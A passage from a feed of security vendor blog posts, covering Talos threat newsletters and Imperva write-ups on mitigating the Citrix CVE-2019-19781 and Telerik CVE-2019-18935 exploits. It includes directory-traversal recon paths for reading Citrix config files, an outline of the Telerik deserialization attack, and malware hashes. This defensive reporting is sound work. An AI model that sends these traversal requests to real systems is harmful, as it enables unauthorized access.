will present the timeline for these events and their technical details. One of the actors is behind the campaign we named \u201cSea Turtle.\u201d This actor is more advanced and more aggressive than others we\u2019ve observed in the past. They do not hesitate to directly target registrars and one registry. The talk will break down these two actors and the methodology used to target the victims. \n \n\n\n### Cyber Security Week in Review\n\n * State-sponsored actors linked to Turkey are believed to be [behind a recent wave of cyber attacks](<https://www.reuters.com/article/us-cyber-attack-hijack-exclusive/exclusive-hackers-acting-in-turkeys-interests-believed-to-be-behind-recent-cyberattacks-sources-idUSKBN1ZQ10X>) targeting governments in the Middle East and Asia. The attackers are using a technique called DNS hijacking that shows similarities to the Sea Turtle actor Cisco Talos discovered last year. \n * Facebook executives backed the security of its WhatsApp messaging software, saying it [could not have been at fault](<https://www.inc.com/jason-aten/facebook-says-apple-is-to-blame-for-hacking-of-jeff-bezos-phone.html>) for the hacking of Amazon CEO Jeff Bezos\u2019 phone. Reports state Bezos was sent a malicious video through WhatsApp and opened it, leading to the installation of spyware. However, Facebook laid the blame at the feet of Apple and iOS\u2019 security. \n * The Bezos incident has led to many wealthy individuals reaching out to cyber security vendors for [private assistance with security](<https://www.ft.com/content/96c79040-40ea-11ea-bdb5-169ba7be433d>). For example, one group is working on an information-sharing platform for cyber attacks targeting members of royal families across the globe. \n * Dozens of United Nations servers and user accounts were [breached during an August cyber attack](<https://www.thenewhumanitarian.org/investigation/2020/01/29/united-nations-cyber-attack>), according to new leaked reports. Staff members working in the UN\u2019s Geneva, Switzerland office were reportedly told to change their passwords but were not made aware of the breach. \n * The Japanese government [adopted a series of new policies](<https://www.infosecurity-magazine.com/news/japan-considers-emergency/>) this week designed to protect government services from a cyber attack during the upcoming Summer Olympics. A special panel called on infrastructure and public transportation services to investigate any potential vulnerabilities in their systems due to the use of internet-of-things devices, and report those flaws immediately to an administrator. \n * Cisco [launched a new security architecture platform for IoT devices](<https://securityboulevard.com/2020/01/cisco-launches-iot-security-platform/>) this week. Cisco Cyber Vision provides users with software and services backed by Talos\u2019 intelligence to identify threats and vulnerabilities in IoT assets in real-time. \n * Facebook [agreed to pay $550 million](<https://techcrunch.com/2020/01/29/facebook-will-pay-550-million-to-settle-class-action-lawsuit-over-privacy-violations/>) as part of a settlement of a class-action lawsuit in Illinois. The suit alleged Facebook violated a state law by using facial recognition technology to auto-tag users in photos without obtaining their consent. \n * The actor behind the Maze ransomware [dumped a large amount of victim data online](<https://arstechnica.com/information-technology/2020/01/dozens-of-companies-have-data-dumped-online-by-ransomware-ring-seeking-leverage/>) this week, including information from an Ohio community college and a grocery store chain in Michigan. Administrators of Maze\u2019s website said in a message that they were sparing recent victim Parkland, Florida, but still leaked some data to prove that they were hacked. \n * The [latest security update to iOS](<https://threatpost.com/apple-patches-ios-device-tracking/152364/>) allows users to disable a location-tracking feature used by many apps. The latest patches also fixed a critical remote code execution vulnerability in the WebKit browsing engine. \n\n \n\n\n### Notable recent security issues\n\n**Title: **[Cisco urging users to update Firepower Management Center immediately to fix severe bug](<https://www.zdnet.com/article/cisco-patch-this-critical-firewall-bug-in-firepower-management-center/>) \n**Description: **Cisco disclosed a high-severity vulnerability in its Firepower Management Center last week that could allow an attacker to bypass the usual authentication steps. The vulnerability \u2014 which was assigned a 9.8 severity score out of 10 \u2014 exists in the way Firepower handles LDAP authentication responses from an external authentication server. An attacker could exploit this flaw by sending a specially crafted HTTP request to the device. Users are also encouraged to turn off LDAP configuration on their devices. Cisco also disclosed seven high-severity flaws and 19 medium-severity security issues in some of its other products, including Smart Software Manager. \n**Snort SIDs: **52627 \u2013 52632, 52641 - 52646 \n** \n****Title: **[Exploitation of Citrix vulnerability spikes after POC released, patches followed](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \n**Description: **Citrix rushed out a patch for its Application Delivery Controller (ADC) and Citrix Gateway products after proof of concept code leaked for a major vulnerability. The company first disclosed CVE-2019-19781 in December, saying a patch was forthcoming. But security researchers have noticed an uptick in exploitation attacks, forcing Citrix to move up its timeline. \n**Snort SIDs: **52620 \n\n\n### Most prevalent malware files this week\n\n**SHA 256:** [85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5](<https://www.virustotal.com/gui/file/85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5/details>) \n**MD5: **8c80dd97c37525927c1e549cb59bcbf3 \n**Typical Filename:** eternalblue-2.2.0.exe \n**Claimed Product: **N/A \n**Detection Name: **W32.85B936960F.5A5226262.auto.Talos \n \n**SHA 256: **[3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3](<https://www.virustotal.com/gui/file/3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3/details>) \n**MD5: **47b97de62ae8b2b927542aa5d7f3c858 \n**Typical Filename: **qmreportupload.exe \n**Claimed Product:** qmreportupload \n**Detection Name: **Win.Trojan.Generic::in10.talos \n \n**SHA 256: **[c0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94** **](<https://www.virustotal.com/gui/file/c0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94/details>) \n**MD5: **7c38a43d2ed9af80932749f6e80fea6f \n**Typical Filename: **xme64-520.exe \n**Claimed Product: **N/A** ** \n**Detection Name: **PUA.Win.File.Coinminer::1201 \n \n**SHA 256: **[c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f](<https://www.virustotal.com/gui/file/c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f/details>) \n**MD5:** e2ea315d9a83e7577053f52c974f6a5a \n**Typical Filename: **c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f \n**Claimed Product: **N/A \n**Detection Name:** W32.AgentWDCR:Gen.21gn.1201 \n** \n****SHA 256: **[d91abcd024d4172fadc5aa82750a18796a549207b76f624b8a9d165459379258](<https://www.virustotal.com/gui/file/d91abcd024d4172fadc5aa82750a18796a549207b76f624b8a9d165459379258/details>)** ** \n**MD5:** a917d39a8ef125300f2f38ff1d1ab0db \n**Typical Filename: **FFChromeSetters \n**Claimed Product: **N/A \n**Detection Name: **PUA.Osx.Adware.Macsearch::agent.tht.talos \n \nKeep up with all things Talos by following us on [Twitter](<https://twitter.com/talossecurity?lang=en>). [Snort](<https://twitter.com/snort?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>), [ClamAV](<https://twitter.com/clamav?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) and [Immunet](<https://twitter.com/immunet?lang=en>) also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast [here](<https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410>) (as well as on your favorite podcast app). And, if you\u2019re not already, you can also subscribe to the weekly Threat Source newsletter [here](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>). \n\n", "cvss3": {}, "published": "2020-01-30T11:00:12", "type": "talosblog", "title": "Threat Source newsletter (Jan. 30, 2020)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-30T11:00:12", "id": "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/VpsmXEgBYno/threat-source-newsletter-jan-30-2020.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-15T21:25:49", "description": "[](<https://1.bp.blogspot.com/-VTnYmwu8m3c/Xhy-eerp0iI/AAAAAAAABag/IaZw8HUa2sMUAmJgZvkCC7JrtedOpg9AACLcBGAsYHQ/s1600/image1.png>)\n\n_By [Edmund Brumaghin](<https://www.blogger.com/profile/10442669663667294759>), with contributions from Dalton Schaadt. _ \n \n\n\n## Executive Summary\n\n \nRecently, the details of a critical vulnerability affecting Citrix Application Delivery Controller and Citrix Gateway servers were publicly disclosed. This vulnerability is currently being tracked using [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>). A public patch has not yet been released, however, Citrix has [released](<https://support.citrix.com/article/CTX267679>) recommendations for steps that affected organizations can take to help mitigate the risk associated with this vulnerability. Successful exploitation of CVE-2019-19781 could allow a remote attacker to execute arbitrary code on affected systems. \n \nThis vulnerability, which is a directory traversal vulnerability, affects multiple [versions](<https://support.citrix.com/article/CTX267027>) of these products. Since the public disclosure of this vulnerability, several proof-of-concept (PoC) tools have been publicly released that can be used by adversaries to scan for vulnerable systems and attempt to exploit the vulnerable condition to achieve remote code execution. There have been multiple public reports of mass-scanning and exploitation activity already being observed in the wild. As such, it is important that organizations are aware of this vulnerability and take steps to ensure that they mitigate the risk of attacks against their environment. \n \n\n\n## Talos coverage for CVE-2019-19781\n\n \nTalos has developed and released coverage for this vulnerability in the form of [Snort](<https://www.snort.org/products>) and [Firepower](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>) signatures. These signatures have been available since Dec. 24, 2019 and can be leveraged by organizations to protect their affected systems from possible exploitation attempts until an official patch is publicly released. \n \n**Snort SIDs:** 52512, 52513, 52603 \n \n", "cvss3": {}, "published": "2020-01-15T11:41:36", "type": "talosblog", "title": "New Snort rules protect against recently discovered Citrix vulnerability", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-15T11:41:36", "id": "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uCR7T0fZRUs/snort-rules-cve-2019-19781.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-23T17:32:42", "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jon Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nThis wasn\u2019t your average Patch Tuesday. Microsoft\u2019s monthly security update was notable for a few reasons. For starters, it\u2019s really time to give up Windows 7, since this is the last free update Microsoft will issue for the operating system. \n \nThere was also a vulnerability that made headlines for leaving Windows open to cryptographic spoofing, which could allow an attacker to sign a malicious file as if it came from a trusted source. The bug was so severe that Microsoft even reached out to the U.S. military ahead of time to issue them an early patch. For more on Patch Tuesday, you can check out our roundup [here](<https://blog.talosintelligence.com/2020/01/microsoft-patch-tuesday-jan-2020.html>) and our Snort rule release [here](<https://blog.snort.org/2020/01/snort-rule-update-for-jan-14-2020.html>). \n \nElsewhere in the vulnerability department, we also released new Snort rules to [protect users against some notable Citrix bugs](<https://blog.talosintelligence.com/2020/01/snort-rules-cve-2019-19781.html>) that have been used in the wild. \n \nAnd, as always, we have the [latest Threat Roundup](<https://blog.talosintelligence.com/2020/01/threat-roundup-0103-0110.html>) where we go through the top threats we saw \u2014 and blocked \u2014 over the past week. \n\n\n### Upcoming public engagements\n\n**Event: **Talos Insights: The State of Cyber Security at Cisco Live Barcelona \n**Location: **Fira Barcelona, Barcelona, Spain \n**Date:** Jan. 27 - 31 \n**Speakers: **Warren Mercer \n**Synopsis: **Cisco Talos specializes in early-warning intelligence and threat analysis necessary for maintaining a secure network. We are responsible for defending networks realize that the security threat landscape is constantly in flux as attackers evolve their skills. Talos advances the overall efficacy of all Cisco security platforms by aggregating data, cooperating with teams of security experts, and applying the cutting-edge big data technology to security. In this talk, we will perform a deep analysis of recent threats and see how Talos leverages large datasets to deliver product improvements and mitigation strategies. \n \n\n\n### Cyber Security Week in Review\n\n * Apple once again [denied the FBI\u2019s request](<https://threatpost.com/apple-denies-fbi-request-to-unlock-shooters-iphone-again/151797/>) for the company to unlock an iPhone belonging to someone involved in a criminal investigation. The agency is attempting to access a device belonging to a man who shot and killed multiple people at a naval base last year. \n * This caused U.S. President Donald Trump to enter the fold. [Trump tweeted](<https://www.bbc.com/news/business-51115645>) that he was unhappy with Apple denying law enforcement access to devices \"used by killers, drug dealers and other violent criminal elements.\u201d \n * More than two weeks after a ransomware attack, foreign currency exchange service Travelex is [finally resuming normal operations](<https://www.zdnet.com/article/two-weeks-after-ransomware-attack-travelex-says-some-systems-are-now-back-online/>). The company recently said it was making \u201cgood progress\u201d on recovery and was expecting customer-facing systems to return soon. \n * The Travelex attack [prompted the U.S. government to release a new warning](<https://www.forbes.com/sites/daveywinder/2020/01/13/us-government-critical-security-alert-upgrade-vpn-or-expect-continued-cyber-attacks/#182cb2f16f70>) that users need to update their VPN services as soon as possible. Vulnerabilities disclosed last year in Pulse Secure VPN leave users open to cyber attacks similar to the ransomware infection on Travelex, according to the U.S. Cybersecurity and Infrastructure Security Agency. \n * The Democratic party in Iowa says it will still use a mobile app to [report primary election results](<https://www.npr.org/2020/01/14/795906732/despite-election-security-fears-iowa-caucuses-will-use-new-smartphone-app>), despite warnings that it is a security risk. Election judges will use the apps to count polling results during the presidential primaries and report those results on their mobile devices, though officials say there will be paper backups to verify the results. \n * The estimated cost of a recent cyber attack on the city of New Orleans is [above $7 million](<https://www.fox8live.com/2020/01/15/city-new-orleans-says-it-will-take-months-recover-recent-cyber-attack/>), $3 million of which the city says it will recoup from its cyber insurance policy. Officials say it will still take months to rebuild their internal network, and departments are still digging out from having to manually carry out many functions for weeks. \n * The U.S. election security czar warned that attempts to interfere in the U.S.\u2019 upcoming presidential election will be [more sophisticated than ever](<https://www.nbcnews.com/politics/national-security/u-s-election-czar-says-attempts-hack-2020-election-will-n1115346>). Shelby Pierson said at a recent presentation America is tracking several hacking groups, including a recent effort uncovered to breach a Ukrainian company at the center of President Donald Trump\u2019s impeachment trial. \n * A critical [vulnerability in a popular WordPress plugin](<https://www.bleepingcomputer.com/news/security/critical-wordpress-plugin-bug-allows-admin-logins-without-password/>) leaves more than 300,000 sites open to attack. An attacker could exploit a bug in InfiniteWP to log in as an administrator on any affected site. \n * Android devices infected with the Faketoken malware began [sending offensive SMS messages](<https://www.kaspersky.com/blog/faketoken-trojan-sends-offensive-sms/32048/>) last week. It sends these messages to foreign numbers, potentially costing the victim money based on their carrier\u2019s policies. \n * The U.S. may invest more than $1 billion into [researching alternatives for 5G](<https://arstechnica.com/tech-policy/2020/01/us-may-subsidize-huawei-alternatives-with-proposed-1-25-billion-fund/>) to avoid working with Chinese tech companies Huawei and ZTE. Legislation submitted in the Senate urged America to counter the Chinese government\u2019s investment in the telecom space.\n\n### Notable recent security issues\n\n**Title: **[Microsoft patches 49 vulnerabilities as part of Patch Tuesday](<https://www.pcworld.com/article/3514172/microsoft-nsa-confirm-killer-windows-10-bug-but-a-patch-is-available.html>) \n**Description: **Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. Patch Tuesday covers 49 vulnerabilities, eight of which are considered critical. This month's security update is particularly important for its disclosure of two vulnerabilities related to a core cryptographic component in all versions of Windows. CVE-2020-0601 could allow an attacker to use cryptography to sign a malicious executable, making the file appear as if it was from a trusted source. The victim would have no way of knowing if the file was malicious. Cyber security reporter Brian Krebs says the vulnerability is so serious, Microsoft secretly deployed a patch to branches of the U.S. military prior to today. \n**Snort SIDs: **52593 - 51596, 52604, 52605 \n \n**Title: **[ZeroCleare wiper malware deployed on oil refinery ](<https://www.zdnet.com/article/new-iranian-data-wiper-malware-hits-bapco-bahrains-national-oil-company/>) \n**Description: **ZeroCleare, a wiper malware connected to an Iranian hacker group, was recently deployed against a national oil refinery in Bahrain. An upgraded version has been spotted in the wild, according to security researchers, which can delete files off infected machines. The latest attacks match previous attacks using this malware family, which have gone after other targets connected to Saudi Arabia. Concerns over Iranian cyber attacks have spiked since the U.S. killed a high-profile Iranian general in a drone strike. \n**Snort SIDs: **52572 \u2013 52581 \n\n\n### Most prevalent malware files this week\n\n**SHA 256: **[1c3ed460a7f78a43bab0ae575056d00c629f35cf7e72443b4e874ede0f305871](<https://www.virustotal.com/gui/file/1c3ed460a7f78a43bab0ae575056d00c629f35cf7e72443b4e874ede0f305871/details>) \n**MD5: **c2406fc0fce67ae79e625013325e2a68 \n**Typical Filename: **SegurazoIC.exe \n**Claimed Product: **Digital Communications Inc. \n**Detection Name: **PUA.Win.Adware.Ursu::95.sbx.tg \n** \n****SHA 256: **[d73ea76f6f07f96b337335213418b58e3fbc7e4b519fec0ef3fbd19c1d335d81](<https://www.virustotal.com/gui/file/d73ea76f6f07f96b337335213418b58e3fbc7e4b519fec0ef3fbd19c1d335d81/details>)** ** \n**MD5: **5142c721e7182065b299951a54d4fe80 \n**Typical Filename: **FlashHelperServices.exe \n**Claimed Product: **Flash Helper Service \n**Detection Name: **PUA.Win.Adware.Flashserv::1201 \n \n**SHA 256:** [c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f](<https://www.virustotal.com/gui/file/c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f/details>)** ** \n**MD5: **e2ea315d9a83e7577053f52c974f6a5a \n**Typical Filename: **c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f.bin** ** \n**Claimed Product: **N/A \n**Detection Name: **W32.AgentWDCR:Gen.21gn.1201 \n** \n****SHA 256: **[15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b](<https://www.virustotal.com/gui/file/15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b/details>) \n**MD5: **799b30f47060ca05d80ece53866e01cc \n**Typical Filename: **mf2016341595.exe \n**Claimed Product: **N/A \n**Detection Name: **W32.Generic:Gen.22fz.1201 \n** \n****SHA 256: **[da231330efd623bc7d116ed233828be88951b9df7cc889e747d31279bdf2c2a0 ](<https://www.virustotal.com/gui/file/da231330efd623bc7d116ed233828be88951b9df7cc889e747d31279bdf2c2a0/details>) \n**MD5: **4a4ee4ce27fa4525be327967b8969e13 \n**Typical Filename: **4a4ee4ce27fa4525be327967b8969e13.exe \n**Claimed Product:** N/A \n**Detection Name: **PUA.Win.File.Coinminer::tpd \n \nKeep up with all things Talos by following us on [Twitter](<https://twitter.com/talossecurity?lang=en>). [Snort](<https://twitter.com/snort?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>), [ClamAV](<https://twitter.com/clamav?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) and [Immunet](<https://twitter.com/immunet?lang=en>) also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast [here](<https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410>) (as well as on your favorite podcast app). And, if you\u2019re not already, you can also subscribe to the weekly Threat Source newsletter [here](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>). \n\n", "cvss3": {}, "published": "2020-01-23T07:27:43", "type": "talosblog", "title": "Threat Source newsletter (Jan. 16, 2019)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-0601"], "modified": "2020-01-23T07:27:43", "id": "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/2OjR0NsavV0/threat-source-newsletter-jan-26-2019.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2020-01-19T15:26:21", "description": "On December 17, Citrix issued a [Security Bulletin](<https://support.citrix.com/article/CTX267027>) on an unauthenticated remote code execution vulnerability (CVE-2019-19781) affecting its Citrix Application Delivery Controller (ADC) - formerly known as NetScaler ADC - and its Citrix Gateway - formerly known as NetScaler Gateway.\n\nAt the time of the security bulletin release, there was no official information available on what the exact vulnerability was, although Citrix did [release Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>) which shed some light on how the vulnerability was exploited. \nThe mitigation offered was to create a responder policy that would prevent HTTP requests with \u2018/../\u2019 and \u2018/vpns/\u2019 in the URL which would trigger a 403 response code.\n\nAt that point it was assumed the vulnerability would most likely take advantage of some sort of directory traversal flaw to upload malicious files to the /vpns/ path, leading to remote code execution. We created several research rules to detect HTTP requests to the suspicious path, but weren\u2019t able to capture any kind of malicious requests at that time.\n\nOn January 3, the [SANS Internet Storm Center (ISC) tweeted](<https://twitter.com/sans_isc/status/1213228049011007489>) that they\u2019d observed the \u201cfirst exploit attempt\u201d for this vulnerability in the wild, although they didn\u2019t include any additional details. At that point in time, no malicious requests were detected on any sites protected by Imperva.\n\nFrom January 7 onwards, several blog posts were published that gradually started to reveal the nature of the attack, until a POC and exploit was published on January 10.\n\nYou can read an in depth analysis of the vulnerability [here](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>) and [here](<https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>).\n\nAs attack activity rose immediately following the release of the POC/exploits, we found that the first stage of the attack was blocked out-of-the-box using existing directory traversal signatures - thus Imperva provided a mitigation for a zero day exploit.\n\nIn addition, the research rules that were set up prior to the POC/exploits both detected and blocked the second stage of the attack. What\u2019s more, they were able to block recon attempts by attackers trying to detect vulnerable Citrix ADC/GW by directly accessing the following paths, in an effort to retrieve the \u2018smb.conf\u2019 configuration file or reach the writeable script \u2018newbm.pl\u2019:\n\n * /vpns/\n * /vpn/../vpns/cfg/smb.conf\n * /vpn/../vpns/portal/scripts/newbm.pl\n\nFrom that point onwards we saw a surge in attack attempts on sites protected by Imperva, as shown in the graphs below:\n\nAfter the two initial exploits were published - a simple Bash script and a more detailed Python script - numerous other variations of the exploit appeared in several GitHub repositories. Below we can see the spread of various clients that were identified based on client verification tests, as sources of exploitation and scanning attempts on Imperva-protected sites:\n\nFrom the graph above we can see that, from January 11 onwards, most exploit attempts were executed using the Bash script - this was identified by cURL User-Agent as the script uses cURL to send the malicious request - followed by the Python scripts (there were two variations of the exploit, one using the Python urllib library, the other using the python-requests library).\n\nIn the last 24 hours (at the time of writing this post) we also noticed a sudden increase in requests from various vulnerability scanners, mainly WhiteHat Vulnerability Scanner.\n\nBelow you can see the amount of Imperva-protected sites targeted since the exploit attempts were detected in the wild, and the total number of sites attacked: \n\n\nAt the end of the day, our customers were protected right out-of-the-box in the Cloud and the On-prem WAF. The Threat Research team will keep tracking this and other zero-day vulnerabilities and their exploits, as well as constantly updating our WAF engine to provide the best mitigation to newly released vulnerabilities.\n\nThe post [Imperva Mitigates Exploits of Citrix Vulnerability - Right Out of the Box](<https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-19T15:00:50", "type": "impervablog", "title": "Imperva Mitigates Exploits of Citrix Vulnerability \u2013 Right Out of the Box", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-19T15:00:50", "id": "IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "href": "https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-07T08:03:43", "description": "On June 18, 2020, the Australian Cyber Security Centre (ACSC) released a disclosure detailing a \u2018sophisticated\u2019 and sustained attack against Australian government bodies and companies. The disclosure was covered by several mainstream media outlets including the [BBC](<https://www.bbc.com/news/world-australia-46096768>), and the [Guardian](<https://www.theguardian.com/australia-news/2020/jun/19/australia-cyber-attack-attacks-hack-state-based-actor-says-australian-prime-minister-scott-morrison>).\n\nThe following day, the Australian prime minister made a [statement](<https://www.pm.gov.au/media/statement-malicious-cyber-activity-against-australian-networks>) about the attacks in which, although he declined to attribute the attacks to a specific threat actor, he suggested that it was \u2018state based\u2019. According to the BBC the prime minister also stressed that the attacks were not limited only to Australia, but affected targets worldwide.\n\nSeveral exploits and indicators of compromise were outlined in the ACSC\u2019s disclosure, including initial access vectors, execution techniques, malware, and persistence techniques. These were all evaluated by our analysts to ensure that, where possible, the Imperva Cloud WAF could mitigate attempts to utilise such vectors. Naturally, some of these items fall outside of the scope of what a WAF is expected to mitigate, such as spear phishing attacks. However, in many instances, the wide-ranging capabilities of Imperva Cloud WAF allows for effective mitigation of the exploits and techniques leveraged in the campaign. In this blog post, we\u2019ll explore some of these exploits and techniques and how Imperva Cloud WAF can mitigate against them.\n\n### The Access Vectors\n\nThe ACSC identified several initial access vectors during the campaign, all of which are detailed [here](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf>). Let\u2019s take a brief look at a few of these vectors, and the mitigation provided by the Imperva Cloud WAF.\n\n### Telerik UI CVE-2019-18935\n\nCVE-2019-18935 is a vulnerability discovered in 2019 by researchers at [Bishop Fox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>), in the RadAsyncUpload file handler in Telerik UI for ASP.net AJAX, a commonly-used suite of web application UI components. The vulnerability is brought about by the [insecure deserialization](<https://www.imperva.com/blog/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/>) of JSON objects, which can lead to remote code execution on the host.\n\nIn order to successfully exploit the insecure deserialization vulnerability identified in CVE-2019-18935, the attacker must also exploit a pre-existing file upload vulnerability, CVE-2017-11317, which identifies the use of a default encryption key to encrypt the data in file upload requests. With this knowledge, an attacker can use the key to modify the \u201cTempTargetFolder\u201d variable in the upload request, essentially allowing file uploads to anywhere in the file system the web server has write permissions to.\n\nThe more recent vulnerability, CVE-2019-18935, details the anatomy of the upload request from RadAsyncUpload, in which the rauPostData parameter contains both a serialized configuration object, and the object\u2019s type.\n\nShown below is the HTTP POST request containing the encrypted rauPostData parameter. The part of the parameter before the \u201c&\u201d, highlighted in blue is the serialized configuration object, and the part after, highlighted in yellow is the object's defined type.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/Telerik-Request.jpg>)\n\nWhen decrypted the configuration object resembles the following:\n \n \n {\n \"TargetFolder\":\"jgas0meSrU/uP/TPzrhDTw==Au0LOaX6ddHOqJL5T8IwoKpc0rwIVPUB/dtjhNpis+s=\",\n \"TempTargetFolder\":\"5wWbvXpnoGw9mTa6QfX46Myim0SoKqJw/9EHc5hWUV4=fkWs4vRRUA8PKwu+jP0J2GwFcymt637TiHk3kmHvRM4=\",\n \"MaxFileSize\":0,\n \"TimeToLive\":{\n \"Ticks\":1440000000000,\n \"Days\":0,\n \"Hours\":40,\n \"Minutes\":0,\n \"Seconds\":0,\n \"Milliseconds\":0,\n \"TotalDays\":1.6666666666666665,\n \"TotalHours\":40,\n \"TotalMinutes\":2400,\n \"TotalSeconds\":144000,\n \"TotalMilliseconds\":144000000\n },\n \"UseApplicationPoolImpersonation\":false\n }\n \n\nAnd the type resembles:\n\n` \nTelerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=2017.1.228, Culture=neutral, PublicKeyToken=121fae78165ba3d4 \n`\n\nIt was discovered that, if the attacker could modify the specified type to be a gadget - a class inside the scope of execution of the application - in a subsequent request, they could achieve remote code execution on the server.\n\nAnalysts at Imperva were able to take the proof of concept code provided, and reproduce the requests made. From here they were able to create cloud WAF rules to distinguish between legitimate traffic from the RadAsyncUpload file handler, and the malicious requests from the PoC code.\n\n**Statistics and observations:**\n\nThroughout June, we observed the attack pattern matching that of an exploit of CVE-2019-18935 on 645 occasions. The following chart shows the top targeted countries during that period.\n\n### Exploitation of Citrix Products CVE-2019-19781\n\nThe vulnerability in Citrix products CVE-2019-19781 was disclosed in a bulletin released by Citrix back in December 2019. Although no proof of concept or exploit was released at the time, it was said to potentially result in remote code execution and was presumed to take advantage of a directory traversal flaw in the application. We\u2019ve already released a blog post covering our mitigation of this vulnerability [here](<https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/>).\n\n**Statistics and observations:**\n\nDuring the month of June we\u2019ve seen the rule put in place for this vulnerability by Imperva Cloud WAF triggered 155,050 times. The following chart shows the top targeted countries during that period.\n\n### Persistence Techniques\n\nThe ACSC identified several different persistence techniques used during the campaign. Among these were several webshells which allowed the attacker to interact with the compromised systems after achieving initial access.\n\nA webshell is a script or piece of code which runs on a web server and allows for administrative actions to be performed remotely. Often these serve legitimate purposes, although uploading of webshells is common practice for attackers seeking to maintain persistence after initially compromising a server. These webshells are commonly referred to as backdoors.\n\n**Imperva\u2019s backdoor protection**\n\nBackdoor protection, which forms a part of the Imperva Cloud WAF, is capable of both detection and mitigation of webshells uploaded to compromised servers to act as backdoors. When certain conditions are met, the Cloud WAF proxies inspect the 